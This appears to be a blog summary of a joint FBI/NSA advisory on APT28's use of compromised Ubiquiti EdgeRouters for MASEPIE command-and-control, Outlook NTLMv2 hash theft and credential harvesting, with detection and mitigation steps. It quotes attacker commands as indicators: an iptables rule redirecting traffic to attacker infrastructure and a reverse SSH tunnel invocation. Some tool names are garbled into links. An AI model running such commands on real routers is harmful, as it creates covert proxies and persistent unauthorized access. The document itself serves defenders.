In ‎December‏ ‎2023, ‎APT28 ‎actors ‎developed ‎MASEPIE,‏ ‎a ‎small‏ ‎Python‏ ‎backdoor ‎capable ‎of‏ ‎executing ‎arbitrary‏ ‎commands ‎on ‎victim ‎machines.‏ ‎An‏ ‎FBI ‎investigation‏ ‎revealed ‎that‏ ‎on ‎more ‎than ‎one ‎occasion,‏ ‎APT28‏ ‎used ‎compromised‏ ‎Ubiquiti ‎EdgeRouters‏ ‎as ‎command-and-control ‎(C2) ‎infrastructure ‎for‏ ‎MASEPIE‏ ‎backdoors‏ ‎deployed ‎against‏ ‎targets.

Command-and-Control ‎Infrastructure

While‏ ‎APT28 ‎does‏ ‎not‏ ‎deploy ‎MASEPIE‏ ‎on ‎EdgeRouters ‎themselves, ‎the ‎compromised‏ ‎routers ‎have‏ ‎been‏ ‎used ‎as ‎C2‏ ‎infrastructure ‎to‏ ‎communicate ‎with ‎and ‎control‏ ‎MASEPIE‏ ‎backdoors ‎installed‏ ‎on ‎systems‏ ‎belonging ‎to ‎targeted ‎individuals ‎and‏ ‎organizations.

The‏ ‎data ‎sent‏ ‎to ‎and‏ ‎from ‎the ‎EdgeRouters ‎acting ‎as‏ ‎C2‏ ‎servers‏ ‎was ‎encrypted‏ ‎using ‎a‏ ‎randomly ‎generated‏ ‎16-character‏ ‎AES ‎key,‏ ‎making ‎it ‎more ‎difficult ‎to‏ ‎detect ‎and‏ ‎analyze‏ ‎the ‎malicious ‎traffic.

MASEPIE‏ ‎Backdoor ‎Functionality

MASEPIE‏ ‎is ‎a ‎Python-based ‎backdoor‏ ‎that‏ ‎allows ‎APT28‏ ‎actors ‎to‏ ‎execute ‎arbitrary ‎commands ‎on ‎the‏ ‎infected‏ ‎systems. ‎This‏ ‎backdoor ‎provides‏ ‎the ‎threat ‎actors ‎with ‎a‏ ‎persistent‏ ‎foothold‏ ‎and ‎remote‏ ‎control ‎capabilities,‏ ‎enabling ‎them‏ ‎to‏ ‎carry ‎out‏ ‎various ‎malicious ‎activities, ‎such ‎as:

Data‏ ‎exfiltration

📌 Lateral ‎movement‏ ‎within‏ ‎the ‎compromised ‎network

📌 Deployment‏ ‎of ‎additional‏ ‎malware ‎or ‎tools

📌 Execution ‎of‏ ‎reconnaissance‏ ‎and ‎intelligence-gathering‏ ‎commands

Mitigation ‎and‏ ‎Investigation

To ‎mitigate ‎the ‎risk ‎of‏ ‎MASEPIE‏ ‎backdoors ‎and‏ ‎the ‎use‏ ‎of ‎compromised ‎EdgeRouters ‎as ‎C2‏ ‎infrastructure,‏ ‎network‏ ‎defenders ‎and‏ ‎users ‎should‏ ‎take ‎the‏ ‎following‏ ‎steps:

📌 Implement ‎endpoint‏ ‎protection: ‎Deploy ‎advanced ‎endpoint ‎protection‏ ‎solutions ‎capable‏ ‎of‏ ‎detecting ‎and ‎preventing‏ ‎the ‎execution‏ ‎of ‎MASEPIE ‎and ‎other‏ ‎malicious‏ ‎Python ‎scripts‏ ‎or ‎backdoors.

📌 Monitor‏ ‎network ‎traffic: Closely ‎monitor ‎network ‎traffic‏ ‎for‏ ‎any ‎suspicious‏ ‎encrypted ‎communications‏ ‎or ‎connections ‎to ‎known ‎APT28‏ ‎infrastructure,‏ ‎including‏ ‎compromised ‎EdgeRouters.

📌 Analyze‏ ‎network ‎logs:‏ ‎Review ‎network‏ ‎logs‏ ‎for ‎any‏ ‎indications ‎of ‎encrypted ‎communications ‎or‏ ‎connections ‎to‏ ‎EdgeRouters‏ ‎that ‎may ‎be‏ ‎acting ‎as‏ ‎C2 ‎servers.

APT28 ‎actors‏ ‎have ‎been ‎using ‎compromised ‎Ubiquiti‏ ‎EdgeRouters ‎to‏ ‎establish‏ ‎proxy ‎connections ‎and‏ ‎reverse ‎SSH‏ ‎tunnels ‎to ‎their ‎dedicated‏ ‎infrastructure.‏ ‎This ‎allows‏ ‎them ‎to‏ ‎maintain ‎persistent ‎access ‎and ‎control‏ ‎over‏ ‎the ‎compromised‏ ‎devices, ‎even‏ ‎after ‎password ‎changes ‎or ‎other‏ ‎mitigation‏ ‎attempts.

Reverse‏ ‎Proxy ‎Connections

APT28‏ ‎actors ‎have‏ ‎utilized ‎iptables‏ ‎rules‏ ‎on ‎EdgeRouters‏ ‎to ‎establish ‎reverse ‎proxy ‎connections‏ ‎to ‎their‏ ‎dedicated‏ ‎infrastructure. ‎Network ‎defenders‏ ‎and ‎users‏ ‎can ‎review ‎iptables ‎chains‏ ‎and‏ ‎Bash ‎histories‏ ‎on ‎EdgeRouters‏ ‎for ‎unusual ‎invocations, ‎such ‎as‏ ‎the‏ ‎following ‎example:

iptables‏ ‎-t ‎nat‏ ‎-I ‎PREROUTING ‎-d ‎<router ‎IP‏ ‎address>‏ ‎-p‏ ‎tcp ‎-m‏ ‎tcp ‎--dport‏ ‎4443 ‎-j‏ ‎DNAT‏ ‎-to-destination ‎<APT28‏ ‎dedicated ‎infrastructure>:10081

This ‎iptables ‎rule ‎redirects‏ ‎incoming ‎traffic‏ ‎on‏ ‎port ‎4443 ‎of‏ ‎the ‎EdgeRouter‏ ‎to ‎the ‎APT28 ‎dedicated‏ ‎infrastructure‏ ‎on ‎port‏ ‎10081, ‎effectively‏ ‎creating ‎a ‎reverse ‎proxy ‎connection.

Reverse‏ ‎SSH‏ ‎Tunnels

Additionally, ‎APT28‏ ‎actors ‎have‏ ‎uploaded ‎adversary ‎controlled ‎SSH ‎RSA‏ ‎keys‏ ‎to‏ ‎compromised ‎EdgeRouters‏ ‎to ‎establish‏ ‎reverse ‎SSH‏ ‎tunnels.‏ ‎These ‎tunnels‏ ‎allow ‎the ‎actors ‎to ‎access‏ ‎the ‎compromised‏ ‎devices,‏ ‎even ‎after ‎password‏ ‎changes ‎or‏ ‎other ‎mitigation ‎attempts.

Network ‎defenders‏ ‎and‏ ‎users ‎can‏ ‎review ‎the‏ ‎following ‎directories ‎on ‎EdgeRouters ‎for‏ ‎unknown‏ ‎RSA ‎keys:

/root/.ssh/

/home/<user>/.ssh/

The‏ ‎presence ‎of‏ ‎unknown ‎RSA ‎keys ‎in ‎these‏ ‎directories‏ ‎may‏ ‎indicate ‎that‏ ‎adversaries ‎have‏ ‎used ‎them‏ ‎to‏ ‎access ‎the‏ ‎EdgeRouters, ‎bypassing ‎password ‎authentication.

Furthermore, ‎network‏ ‎defenders ‎can‏ ‎query‏ ‎network ‎traffic ‎logs‏ ‎on ‎EdgeRouters‏ ‎to ‎identify ‎abnormal ‎SSH‏ ‎sessions.‏ ‎An ‎invocation‏ ‎of ‎a‏ ‎reverse ‎SSH ‎tunnel ‎used ‎by‏ ‎APT28‏ ‎actors ‎is‏ ‎provided ‎below:

ssh‏ ‎–i ‎<RSA ‎key> ‎-p ‎<port>‏ ‎root@<router‏ ‎IP‏ ‎address> ‎-R‏ ‎<router ‎IP‏ ‎address>:<port>

This ‎command‏ ‎establishes‏ ‎a ‎reverse‏ ‎SSH ‎tunnel ‎from ‎the ‎EdgeRouter‏ ‎to ‎the‏ ‎APT28‏ ‎infrastructure, ‎allowing ‎the‏ ‎actors ‎to‏ ‎maintain ‎remote ‎access ‎and‏ ‎control‏ ‎over ‎the‏ ‎compromised ‎device.

APT28 ‎actors‏ ‎have ‎been ‎exploiting ‎CVE-2023-23397, ‎a‏ ‎critical ‎elevation‏ ‎of‏ ‎privilege ‎vulnerability ‎in‏ ‎Microsoft ‎Outlook‏ ‎on ‎Windows, ‎to ‎facilitate‏ ‎NTLMv2‏ ‎credential ‎leaks.‏ ‎This ‎vulnerability,‏ ‎which ‎was ‎a ‎zero-day ‎at‏ ‎the‏ ‎time ‎of‏ ‎its ‎initial‏ ‎exploitation ‎by ‎APT28 ‎in ‎early‏ ‎2022,‏ ‎allows‏ ‎Net-NTLMv2 ‎hashes‏ ‎to ‎be‏ ‎leaked ‎to‏ ‎actor-controlled‏ ‎infrastructure.

NTLMv2 ‎Credential‏ ‎Harvesting

To ‎exploit ‎CVE-2023-23397 ‎and ‎harvest‏ ‎NTLMv2 ‎credentials,‏ ‎APT28‏ ‎actors ‎have ‎been‏ ‎using ‎two‏ ‎publicly ‎available ‎tools:

📌 http://ntlmrelayx.py: This ‎tool‏ ‎is‏ ‎part ‎of‏ ‎the ‎Impacket‏ ‎suite, ‎a ‎collection ‎of ‎Python‏ ‎classes‏ ‎for ‎working‏ ‎with ‎network‏ ‎protocols. ‎APT28 ‎actors ‎have ‎used‏ ‎http://ntlmrelayx.py to‏ ‎execute‏ ‎NTLM ‎relay‏ ‎attacks ‎[T1557]‏ ‎and ‎facilitate‏ ‎the‏ ‎leakage ‎of‏ ‎NTLMv2 ‎credentials.

📌 Responder: ‎Responder ‎is ‎a‏ ‎tool ‎designed‏ ‎to‏ ‎capture ‎and ‎relay‏ ‎NTLMv2 ‎hashes‏ ‎by ‎setting ‎up ‎a‏ ‎rogue‏ ‎authentication ‎server‏ ‎[T1556]. ‎APT28‏ ‎actors ‎have ‎installed ‎Responder ‎on‏ ‎compromised‏ ‎Ubiquiti ‎EdgeRouters‏ ‎to ‎collect‏ ‎NTLMv2 ‎credentials ‎from ‎targeted ‎Outlook‏ ‎accounts.

The‏ ‎FBI‏ ‎has ‎collected‏ ‎evidence ‎of‏ ‎APT28's ‎CVE-2023-23397‏ ‎exploitation‏ ‎activity ‎on‏ ‎numerous ‎compromised ‎EdgeRouters.

Logging ‎and ‎Detection

📌 When‏ ‎using ‎the‏ ‎default‏ ‎configurations, ‎Responder ‎logs‏ ‎its ‎activity‏ ‎to ‎the ‎following ‎files:

📌 Responder-Session.log

📌 Responder.db

Network‏ ‎defenders‏ ‎and ‎users‏ ‎can ‎search‏ ‎for ‎these ‎log ‎files, ‎as‏ ‎well‏ ‎as ‎the‏ ‎presence ‎of‏ ‎http://ntlmrelayx.py and ‎Responder ‎tooling, ‎on ‎EdgeRouters‏ ‎to‏ ‎identify‏ ‎potential ‎APT28‏ ‎activity ‎related‏ ‎to ‎the‏ ‎exploitation‏ ‎of ‎CVE-2023-23397.

Mitigation‏ ‎and ‎Investigation

To ‎mitigate ‎the ‎risk‏ ‎of ‎CVE-2023-23397‏ ‎exploitation‏ ‎and ‎NTLMv2 ‎credential‏ ‎leaks, ‎network‏ ‎defenders ‎and ‎users ‎should‏ ‎take‏ ‎the ‎following‏ ‎steps:

📌 Apply ‎the‏ ‎Microsoft ‎patch: Microsoft ‎has ‎released ‎a‏ ‎patch‏ ‎to ‎address‏ ‎CVE-2023-23397. ‎Ensure‏ ‎that ‎all ‎Outlook ‎installations ‎are‏ ‎updated‏ ‎with‏ ‎the ‎latest‏ ‎security ‎updates.

📌 Scan‏ ‎for ‎compromised‏ ‎EdgeRouters:‏ ‎Use ‎the‏ ‎provided ‎information ‎to ‎scan ‎EdgeRouters‏ ‎for ‎the‏ ‎presence‏ ‎of ‎http://ntlmrelayx.py, Responder, ‎and‏ ‎their ‎associated‏ ‎log ‎files. ‎Identify ‎and‏ ‎isolate‏ ‎any ‎compromised‏ ‎routers ‎for‏ ‎further ‎investigation.

📌 Reset ‎compromised ‎credentials: ‎If‏ ‎NTLMv2‏ ‎credential ‎leaks‏ ‎are ‎detected,‏ ‎reset ‎the ‎affected ‎user ‎accounts‏ ‎and‏ ‎implement‏ ‎additional ‎security‏ ‎measures, ‎such‏ ‎as ‎multi-factor‏ ‎authentication.

📌 Implement‏ ‎recommended ‎mitigation:‏ ‎Follow ‎the ‎recommended ‎mitigation ‎for‏ ‎compromised ‎EdgeRouters‏ ‎,‏ ‎including ‎performing ‎a‏ ‎hardware ‎factory‏ ‎reset, ‎upgrading ‎to ‎the‏ ‎latest‏ ‎firmware ‎version,‏ ‎and ‎changing‏ ‎default ‎usernames ‎and ‎passwords.

APT28 ‎actors‏ ‎have ‎been ‎hosting ‎custom ‎Python‏ ‎scripts ‎on‏ ‎compromised‏ ‎Ubiquiti ‎EdgeRouters ‎to‏ ‎collect ‎and‏ ‎validate ‎stolen ‎webmail ‎account‏ ‎credentials.‏ ‎These ‎scripts‏ ‎are ‎typically‏ ‎stored ‎alongside ‎related ‎log ‎files‏ ‎in‏ ‎the ‎home‏ ‎directory ‎of‏ ‎a ‎compromised ‎user, ‎such ‎as:

/home/<compromised‏ ‎user>/srv/http://core.py

/home/<compromised‏ ‎user>/srv/debug.txt

The‏ ‎FBI ‎claims‏ ‎that ‎they‏ ‎have ‎recovered‏ ‎verbose‏ ‎log ‎files‏ ‎containing ‎information ‎about ‎APT28 ‎activity‏ ‎on ‎the‏ ‎compromised‏ ‎EdgeRouters.

Custom ‎Python ‎Scripts

📌 The‏ ‎custom ‎Python‏ ‎scripts ‎hosted ‎on ‎the‏ ‎compromised‏ ‎EdgeRouters ‎serve‏ ‎the ‎purpose‏ ‎of ‎collecting ‎and ‎validating ‎stolen‏ ‎webmail‏ ‎account ‎credentials.‏ ‎APT28 ‎actors‏ ‎use ‎these ‎scripts ‎as ‎part‏ ‎of‏ ‎their‏ ‎credential ‎harvesting‏ ‎operations, ‎targeting‏ ‎specific ‎webmail‏ ‎users.

📌 The‏ ‎scripts ‎are‏ ‎designed ‎to ‎automatically ‎break ‎captcha‏ ‎problems ‎on‏ ‎webmail‏ ‎login ‎pages, ‎allowing‏ ‎the ‎actors‏ ‎to ‎bypass ‎this ‎security‏ ‎measure‏ ‎and ‎gain‏ ‎unauthorized ‎access‏ ‎to ‎the ‎targeted ‎accounts. ‎To‏ ‎achieve‏ ‎this, ‎the‏ ‎scripts ‎make‏ ‎connections ‎to ‎the ‎API ‎endpoint‏ ‎api[.]anti-captcha[.]com,‏ ‎which‏ ‎is ‎used‏ ‎by ‎APT28‏ ‎actors ‎for‏ ‎captcha-solving‏ ‎purposes.

Yara ‎Rule‏ ‎for ‎Detection

📌 To ‎help ‎network ‎defenders‏ ‎locate ‎credential‏ ‎collection‏ ‎scripts ‎on ‎compromised‏ ‎EdgeRouters, ‎the‏ ‎FBI ‎has ‎created ‎a‏ ‎Yara‏ ‎rule. ‎Yara‏ ‎is ‎a‏ ‎tool ‎used ‎to ‎identify ‎and‏ ‎classify‏ ‎malware ‎based‏ ‎on ‎textual‏ ‎or ‎binary ‎patterns. ‎The ‎FBI-provided‏ ‎Yara‏ ‎rule‏ ‎can ‎be‏ ‎used ‎to‏ ‎scan ‎the‏ ‎file‏ ‎system ‎of‏ ‎EdgeRouters ‎and ‎detect ‎the ‎presence‏ ‎of ‎the‏ ‎custom‏ ‎Python ‎scripts ‎used‏ ‎by ‎APT28‏ ‎actors.

📌 In ‎addition ‎to ‎using‏ ‎the‏ ‎Yara ‎rule,‏ ‎network ‎defenders‏ ‎can ‎also ‎query ‎network ‎traffic‏ ‎for‏ ‎connections ‎to‏ ‎the ‎api[.]anti-captcha[.]com‏ ‎endpoint. ‎Detecting ‎traffic ‎to ‎this‏ ‎API‏ ‎can‏ ‎help ‎identify‏ ‎compromised ‎EdgeRouters‏ ‎and ‎potential‏ ‎credential‏ ‎harvesting ‎activities.

Mitigation‏ ‎and ‎Investigation

📌 Upon ‎detecting ‎the ‎presence‏ ‎of ‎custom‏ ‎Python‏ ‎scripts ‎or ‎connections‏ ‎to ‎the‏ ‎api[.]anti-captcha[.]com ‎endpoint, ‎network ‎defenders‏ ‎should‏ ‎take ‎immediate‏ ‎action ‎to‏ ‎mitigate ‎the ‎risk ‎and ‎investigate‏ ‎the‏ ‎extent ‎of‏ ‎the ‎compromise:

📌 Isolating‏ ‎the ‎affected ‎EdgeRouters ‎from ‎the‏ ‎network

📌 Performing‏ ‎a‏ ‎thorough ‎analysis‏ ‎of ‎the‏ ‎scripts ‎and‏ ‎log‏ ‎files ‎to‏ ‎understand ‎the ‎scope ‎of ‎the‏ ‎credential ‎harvesting‏ ‎activities

📌 Resetting‏ ‎passwords ‎for ‎potentially‏ ‎compromised ‎webmail‏ ‎accounts

APT28 ‎actors‏ ‎have ‎been ‎leveraging ‎default ‎credentials‏ ‎and ‎trojanized‏ ‎OpenSSH‏ ‎server ‎processes ‎to‏ ‎access ‎Ubiquiti‏ ‎EdgeRouters. ‎The ‎trojanized ‎OpenSSH‏ ‎server‏ ‎processes ‎are‏ ‎associated ‎with‏ ‎Moobot, ‎a ‎Mirai-based ‎botnet ‎that‏ ‎infects‏ ‎Internet ‎of‏ ‎Things ‎(IoT)‏ ‎devices ‎using ‎remotely ‎exploitable ‎vulnerabilities,‏ ‎such‏ ‎as‏ ‎weak ‎or‏ ‎default ‎passwords.

Trojanized‏ ‎OpenSSH ‎Server‏ ‎Binaries

📌 Trojanized‏ ‎OpenSSH ‎server‏ ‎binaries ‎downloaded ‎from ‎packinstall[.]kozow[.]com ‎have‏ ‎replaced ‎legitimate‏ ‎binaries‏ ‎on ‎EdgeRouters ‎accessed‏ ‎by ‎APT28.‏ ‎These ‎trojanized ‎binaries ‎allow‏ ‎remote‏ ‎attackers ‎to‏ ‎bypass ‎authentication‏ ‎and ‎gain ‎unauthorized ‎access ‎to‏ ‎the‏ ‎compromised ‎routers.

📌 The‏ ‎Moobot ‎botnet‏ ‎is ‎known ‎for ‎its ‎ability‏ ‎to‏ ‎exploit‏ ‎vulnerabilities ‎in‏ ‎IoT ‎devices,‏ ‎particularly ‎those‏ ‎with‏ ‎weak ‎or‏ ‎default ‎passwords. ‎By ‎replacing ‎the‏ ‎legitimate ‎OpenSSH‏ ‎server‏ ‎binaries ‎with ‎trojanized‏ ‎versions, ‎APT28‏ ‎actors ‎can ‎maintain ‎persistent‏ ‎access‏ ‎to ‎the‏ ‎compromised ‎EdgeRouters‏ ‎and ‎use ‎them ‎for ‎various‏ ‎malicious‏ ‎purposes.

Mirai-based ‎Botnet

📌 Moobot‏ ‎is ‎a‏ ‎Mirai-based ‎botnet, ‎which ‎means ‎it‏ ‎is‏ ‎derived‏ ‎from ‎the‏ ‎infamous ‎Mirai‏ ‎malware ‎that‏ ‎first‏ ‎emerged ‎in‏ ‎2016. ‎Mirai ‎is ‎designed ‎to‏ ‎scan ‎for‏ ‎and‏ ‎infect ‎IoT ‎devices‏ ‎by ‎exploiting‏ ‎common ‎vulnerabilities ‎and ‎using‏ ‎default‏ ‎credentials. ‎Once‏ ‎a ‎device‏ ‎is ‎infected, ‎it ‎becomes ‎part‏ ‎of‏ ‎the ‎botnet‏ ‎and ‎can‏ ‎be ‎used ‎for ‎distributed ‎denial-of-service‏ ‎(DDoS)‏ ‎attacks,‏ ‎credential ‎stuffing,‏ ‎and ‎other‏ ‎malicious ‎activities.

📌 The‏ ‎use‏ ‎of ‎a‏ ‎Mirai-based ‎botnet ‎like ‎Moobot ‎highlights‏ ‎the ‎importance‏ ‎of‏ ‎securing ‎IoT ‎devices,‏ ‎such ‎as‏ ‎routers, ‎by ‎changing ‎default‏ ‎passwords‏ ‎and ‎keeping‏ ‎the ‎firmware‏ ‎up ‎to ‎date. ‎The ‎combination‏ ‎of‏ ‎weak ‎or‏ ‎default ‎passwords‏ ‎and ‎unpatched ‎vulnerabilities ‎makes ‎these‏ ‎devices‏ ‎an‏ ‎attractive ‎target‏ ‎for ‎threat‏ ‎actors ‎like‏ ‎APT28.

Impact‏ ‎on ‎Compromised‏ ‎EdgeRouters

With ‎the ‎trojanized ‎OpenSSH ‎server‏ ‎processes ‎in‏ ‎place,‏ ‎APT28 ‎actors ‎can‏ ‎maintain ‎persistent‏ ‎access ‎to ‎the ‎compromised‏ ‎EdgeRouters.‏ ‎This ‎allows‏ ‎them ‎to‏ ‎use ‎the ‎routers ‎as ‎a‏ ‎platform‏ ‎for ‎various‏ ‎malicious ‎activities,‏ ‎such ‎as:

📌 Harvesting ‎credentials

📌 Collecting ‎NTLMv2 ‎digests

📌 Proxying‏ ‎network‏ ‎traffic

📌 Hosting‏ ‎spear-phishing ‎landing‏ ‎pages ‎and‏ ‎custom ‎tools

Threat ‎Actor's‏ ‎operations ‎have ‎targeted ‎various ‎industries,‏ ‎including ‎Aerospace‏ ‎&‏ ‎Defense, ‎Education, ‎Energy‏ ‎& ‎Utilities,‏ ‎Governments, ‎Hospitality, ‎Manufacturing, ‎Oil‏ ‎&‏ ‎Gas, ‎Retail,‏ ‎Technology, ‎and‏ ‎Transportation. ‎The ‎targeted ‎countries ‎include‏ ‎the‏ ‎Czech ‎Republic,‏ ‎Italy, ‎Lithuania,‏ ‎Jordan, ‎Montenegro, ‎Poland, ‎Slovakia, ‎Turkey,‏ ‎Ukraine,‏ ‎United‏ ‎Arab ‎Emirates,‏ ‎and ‎the‏ ‎US, ‎with‏ ‎a‏ ‎strategic ‎focus‏ ‎on ‎individuals ‎in ‎Ukraine.

Potential ‎consequences‏ ‎and ‎impacts‏ ‎on‏ ‎these ‎affected ‎industries‏ ‎include:

📌 Data ‎breaches‏ ‎and ‎theft ‎of ‎sensitive‏ ‎information,‏ ‎intellectual ‎property,‏ ‎or ‎trade‏ ‎secrets.

📌 Disruption ‎of ‎critical ‎infrastructure ‎operations,‏ ‎such‏ ‎as ‎power‏ ‎grids, ‎transportation‏ ‎systems, ‎or ‎manufacturing ‎processes.

📌 Compromise ‎of‏ ‎government‏ ‎networks‏ ‎and ‎systems,‏ ‎potentially ‎leading‏ ‎to ‎espionage‏ ‎or‏ ‎national ‎security‏ ‎threats.

📌 Financial ‎losses ‎due ‎to ‎operational‏ ‎disruptions, ‎theft‏ ‎of‏ ‎customer ‎data, ‎or‏ ‎reputational ‎damage.

📌 Potential‏ ‎safety ‎risks ‎if ‎control‏ ‎systems‏ ‎or ‎operational‏ ‎technology ‎(OT)‏ ‎networks ‎are ‎compromised.

📌 Loss ‎of ‎customer‏ ‎trust‏ ‎and ‎confidence‏ ‎in ‎the‏ ‎affected ‎organizations.

MITRE ‎ATT&CK ‎TTPs

Resource ‎Development:

T1587‏ ‎(Develop‏ ‎Capabilities): APT28‏ ‎authored ‎custom‏ ‎Python ‎scripts‏ ‎to ‎collect‏ ‎webmail‏ ‎account ‎credentials.

T1588‏ ‎(Obtain ‎Capabilities): ‎APT28 ‎accessed ‎EdgeRouters‏ ‎compromised ‎by‏ ‎the‏ ‎Moobot ‎botnet, ‎which‏ ‎installs ‎OpenSSH‏ ‎trojans.

Initial ‎Access:

T1584 ‎(Compromise ‎Infrastructure): APT28‏ ‎accessed‏ ‎EdgeRouters ‎previously‏ ‎compromised ‎by‏ ‎an ‎OpenSSH ‎trojan.

📌 T1566 ‎(Phishing): ‎APT28‏ ‎conducted‏ ‎cross-site ‎scripting‏ ‎and ‎browser-in-the-browser‏ ‎spear-phishing ‎campaigns.

Execution:

T1203 ‎(Exploitation ‎for ‎Client‏ ‎Execution):‏ ‎APT28‏ ‎exploited ‎the‏ ‎CVE-2023-23397 ‎vulnerability.

Persistence:

📌 T1546‏ ‎(Event ‎Triggered‏ ‎Execution):‏ ‎The ‎compromised‏ ‎routers ‎housed ‎Bash ‎scripts ‎and‏ ‎ELF ‎binaries‏ ‎designed‏ ‎to ‎backdoor ‎OpenSSH‏ ‎daemons ‎and‏ ‎related ‎services.

Credential ‎Access:

📌 T1557 ‎(Adversary-in-the-Middle):‏ ‎APT28‏ ‎installed ‎tools‏ ‎like ‎Impacket‏ ‎http://ntlmrelayx.py and ‎Responder ‎on ‎compromised ‎routers‏ ‎to‏ ‎execute ‎NTLM‏ ‎relay ‎attacks.

📌 T1556‏ ‎(Modify ‎Authentication ‎Process): ‎APT28 ‎hosted‏ ‎NTLMv2‏ ‎rogue‏ ‎authentication ‎servers‏ ‎to ‎modify‏ ‎the ‎authentication‏ ‎process‏ ‎using ‎stolen‏ ‎credentials ‎from ‎NTLM ‎relay ‎attacks.

Collection:

📌 T1119‏ ‎(Automated ‎Collection): APT28‏ ‎utilized‏ ‎CVE-2023-23397 ‎to ‎automate‏ ‎the ‎collection‏ ‎of ‎NTLMv2 ‎hashes.

Exfiltration:

📌 T1020 ‎(Automated‏ ‎Exfiltration): APT28‏ ‎utilized ‎CVE-2023-23397‏ ‎to ‎automate‏ ‎the ‎exfiltration ‎of ‎data ‎to‏ ‎actor-controlled‏ ‎infrastructure.

The ‎document‏ ‎titled ‎«Cyber ‎Actors ‎Use ‎Compromised‏ ‎Routers ‎to‏ ‎Facilitate‏ ‎Cyber ‎Operations» ‎released‏ ‎by ‎the‏ ‎Federal ‎Bureau ‎of ‎Investigation‏ ‎(FBI),‏ ‎National ‎Security‏ ‎Agency ‎(NSA),‏ ‎US ‎Cyber ‎Command, ‎and ‎international‏ ‎partners‏ ‎warns ‎of‏ ‎use ‎of‏ ‎compromised ‎Ubiquiti ‎EdgeRouters ‎to ‎facilitate‏ ‎malicious‏ ‎cyber‏ ‎operations ‎worldwide.

The‏ ‎popularity ‎of‏ ‎Ubiquiti ‎EdgeRouters‏ ‎is‏ ‎attributed ‎to‏ ‎their ‎user-friendly, ‎Linux-based ‎operating ‎system,‏ ‎default ‎credentials,‏ ‎and‏ ‎limited ‎firewall ‎protections.‏ ‎The ‎routers‏ ‎are ‎often ‎shipped ‎with‏ ‎insecure‏ ‎default ‎configurations‏ ‎and ‎do‏ ‎not ‎automatically ‎update ‎firmware ‎unless‏ ‎configured‏ ‎by ‎the‏ ‎user.

The ‎compromised‏ ‎EdgeRouters ‎have ‎been ‎used ‎by‏ ‎APT28‏ ‎to‏ ‎harvest ‎credentials,‏ ‎collect ‎NTLMv2‏ ‎digests, ‎proxy‏ ‎network‏ ‎traffic, ‎and‏ ‎host ‎spear-phishing ‎landing ‎pages ‎and‏ ‎custom ‎tools.‏ ‎APT28‏ ‎accessed ‎the ‎routers‏ ‎using ‎default‏ ‎credentials ‎and ‎trojanized ‎OpenSSH‏ ‎server‏ ‎processes. ‎With‏ ‎root ‎access‏ ‎to ‎the ‎compromised ‎routers, ‎the‏ ‎actors‏ ‎had ‎unfettered‏ ‎access ‎to‏ ‎the ‎Linux-based ‎operating ‎systems ‎to‏ ‎install‏ ‎tooling‏ ‎and ‎obfuscate‏ ‎their ‎identity.

APT28‏ ‎also ‎deployed‏ ‎custom‏ ‎Python ‎scripts‏ ‎on ‎the ‎compromised ‎routers ‎to‏ ‎collect ‎and‏ ‎validate‏ ‎stolen ‎webmail ‎account‏ ‎credentials ‎obtained‏ ‎through ‎cross-site ‎scripting ‎and‏ ‎browser-in-the-browser‏ ‎spear-phishing ‎campaigns.‏ ‎Additionally, ‎they‏ ‎exploited ‎a ‎critical ‎zero-day ‎elevation-of-privilege‏ ‎vulnerability‏ ‎in ‎Microsoft‏ ‎Outlook ‎(CVE-2023-23397)‏ ‎to ‎collect ‎NTLMv2 ‎digests ‎from‏ ‎targeted‏ ‎Outlook‏ ‎accounts ‎and‏ ‎used ‎publicly‏ ‎available ‎tools‏ ‎to‏ ‎assist ‎with‏ ‎NTLM ‎relay ‎attacks

Keypoints ‎and ‎takeaways

📌 APT28‏ ‎(also ‎known‏ ‎as‏ ‎Fancy ‎Bear, ‎Forest‏ ‎Blizzard, ‎and‏ ‎Strontium) ‎have ‎been ‎exploiting‏ ‎compromised‏ ‎Ubiquiti ‎EdgeRouters‏ ‎to ‎conduct‏ ‎malicious ‎cyber ‎ops ‎globally.

📌 The ‎exploitation‏ ‎includes‏ ‎harvesting ‎credentials,‏ ‎collecting ‎NTLMv2‏ ‎digests, ‎proxying ‎network ‎traffic, ‎and‏ ‎hosting‏ ‎spear-phishing‏ ‎landing ‎pages‏ ‎and ‎custom‏ ‎tools.

📌 The ‎FBI,‏ ‎NSA,‏ ‎US ‎Cyber‏ ‎Command, ‎and ‎international ‎partners ‎have‏ ‎issued ‎a‏ ‎joint‏ ‎Cybersecurity ‎Advisory ‎(CSA)‏ ‎detailing ‎the‏ ‎threat ‎and ‎providing ‎mitigation‏ ‎recommendations.

📌 The‏ ‎advisory ‎includes‏ ‎observed ‎tactics,‏ ‎techniques, ‎and ‎procedures ‎(TTPs), ‎indicators‏ ‎of‏ ‎compromise ‎(IOCs),‏ ‎and ‎maps‏ ‎the ‎threat ‎actors' ‎activity ‎to‏ ‎the‏ ‎MITRE‏ ‎ATT& ‎CK‏ ‎framework.

📌 The ‎advisory‏ ‎urges ‎immediate‏ ‎action‏ ‎to ‎mitigate‏ ‎the ‎threat, ‎including ‎performing ‎hardware‏ ‎factory ‎resets,‏ ‎updating‏ ‎firmware, ‎changing ‎default‏ ‎credentials, ‎and‏ ‎implementing ‎strategic ‎firewall ‎rules.

📌 APT28‏ ‎has‏ ‎used ‎compromised‏ ‎EdgeRouters ‎since‏ ‎at ‎least ‎2022 ‎to ‎facilitate‏ ‎covert‏ ‎operations ‎against‏ ‎various ‎industries‏ ‎and ‎countries, ‎including ‎the ‎US.

📌 The‏ ‎EdgeRouters‏ ‎are‏ ‎popular ‎due‏ ‎to ‎their‏ ‎user-friendly ‎Linux-based‏ ‎operating‏ ‎system ‎but‏ ‎are ‎often ‎shipped ‎with ‎default‏ ‎credentials ‎and‏ ‎limited‏ ‎firewall ‎protections.

📌 The ‎advisory‏ ‎provides ‎detailed‏ ‎TTPs ‎and ‎IOCs ‎to‏ ‎help‏ ‎network ‎defenders‏ ‎identify ‎and‏ ‎mitigate ‎the ‎threat.

📌 The ‎advisory ‎also‏ ‎includes‏ ‎information ‎on‏ ‎how ‎to‏ ‎map ‎malicious ‎cyber ‎activity ‎to‏ ‎the‏ ‎MITRE‏ ‎ATT& ‎CK‏ ‎framework.

📌 Organizations ‎using‏ ‎Ubiquiti ‎EdgeRouters‏ ‎must‏ ‎take ‎immediate‏ ‎action ‎to ‎secure ‎their ‎devices‏ ‎against ‎APT28‏ ‎exploitation.

